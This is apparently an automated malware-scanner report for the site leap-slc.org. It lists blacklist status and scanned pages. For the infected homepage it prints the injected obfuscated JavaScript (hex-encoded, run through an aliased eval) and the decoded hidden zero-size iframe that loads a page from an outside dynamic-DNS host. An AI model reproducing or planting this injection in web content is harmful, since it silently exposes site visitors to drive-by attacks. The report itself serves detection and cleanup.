New scan:

Malware Scanner report for leap-slc.org

Malicious/Suspicious/Total urls checked
1/0/11
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "leap-slc.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=leap-slc.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://leap-slc.org/
200 OK
Content-Length: 9338
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var wsqWQBPps = "cNRoPJdqz3ccNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz20cNRoPJdqz73cNRoPJdqz72cNRoPJdqz63cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz68cNRoPJdqz74cNRoPJdqz74cNRoPJdqz70cNRoPJdqz3acNRoPJdqz2fcNRoPJdqz2fcNRoPJdqz70cNRoPJdqz72cNRoPJdqz69cNRoPJdqz76cNRoPJdqz61cNRoPJdqz74cNRoPJdqz65cNRoPJdqz33cNRoPJdqz2ecNRoPJdqz7acNRoPJdqz61cNRoPJdqz70cNRoPJdqz74cNRoPJdqz6fcNRoPJdqz2ecNRoPJdqz6fcNRoPJdqz72cNRoPJdqz67cNRoPJdqz2fcNRoPJdqz62cNRoPJdqz6ccNRoPJdqz6fcNRoPJdqz67cNRoPJdqz2
... 1297 bytes are skipped ...
65cNRoPJdqz69cNRoPJdqz67cNRoPJdqz68cNRoPJdqz74cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz20cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz62cNRoPJdqz6fcNRoPJdqz72cNRoPJdqz64cNRoPJdqz65cNRoPJdqz72cNRoPJdqz3dcNRoPJdqz22cNRoPJdqz30cNRoPJdqz22cNRoPJdqz3ecNRoPJdqz3ccNRoPJdqz2fcNRoPJdqz69cNRoPJdqz66cNRoPJdqz72cNRoPJdqz61cNRoPJdqz6dcNRoPJdqz65cNRoPJdqz3e"; yvDFQwwmM = eval; var WSxQJgvuB = wsqWQBPps.replace(/cNRoPJdqz/g, "%"); yvDFQwwmM("document.write(unescape(WSxQJgvuB))");

Decoded script:


document.write(unescape(WSxQJgvuB))
document.write(unescape(WSxQJgvuB))
<iframe src="http://private3.zapto.org/blog/vlqsryyacr.php?vaowv=NHcCqUFS&amp;hrytewsfd=9889439&amp;yjresfd=854" name="yfejCPCzbA" title="NesXoYGTBz" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Rising
Hack.Exploit.Win32.HTML.Iframe.fir

http://leap-slc.org/test/apacheasp/test.asp
200 OK
Content-Length: 645
Content-Type: text/html
clean
http://leap-slc.org/test404page.js
404 Not Found
Content-Length: 274
Content-Type: text/html
clean
http://leap-slc.org/test/ssi/test.shtml
200 OK
Content-Length: 1441
Content-Type: text/html
clean
http://leap-slc.org/test/php/test.php
200 OK
Content-Length: 970
Content-Type: application/x-httpd-php
clean
http://leap-slc.org/test/coldfusion/test.cfm
200 OK
Content-Length: 660
Content-Type: text/html
clean
http://leap-slc.org/test/perl/test.pl
200 OK
Content-Length: 767
Content-Type: text/html
clean
http://leap-slc.org/test/python/test.py
200 OK
Content-Length: 1204
Content-Type: text/plain
clean
http://leap-slc.org/test/fcgi/test.fcgi
403 Forbidden
Content-Length: 283
Content-Type: text/html
clean
http://leap-slc.org/test/miva/test.mvc?
200 OK
Content-Length: 6326
Content-Type: text/plain
clean
http://leap-slc.org/test/miva/documenturlTest=sysvars[Run]</A></TR> Test Data Directory Test=datadir Test Script Directory Test=scriptdir</TABLE></P>test_systemvariablessysvarlistposcurrent, test_datadirectoryok Testing writes to data directory: diag.dats.time_t, s.version, s.apitype|MvEXPORT_Error Testing reads from data directory: l.time_t, l.version, l.apity <span>...170 symbols skipped</span>
404 Not Found
Content-Length: 836
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: leap-slc.org

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=172800
Connection: close
Date: Sun, 11 Jan 2015 02:31:27 GMT
Accept-Ranges: bytes
ETag: "2f6c0bc-247a-7137f040"
Server: Apache
Vary: Accept-Encoding
Content-Length: 9338
Content-Type: text/html
Expires: Tue, 13 Jan 2015 02:31:27 GMT
Last-Modified: Fri, 12 Jul 2013 12:13:45 GMT

...9338 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: leap-slc.org
Referer: http://www.google.com/search?q=leap-slc.org

Result:
The result is similar to the first query. There are no suspicious redirects found.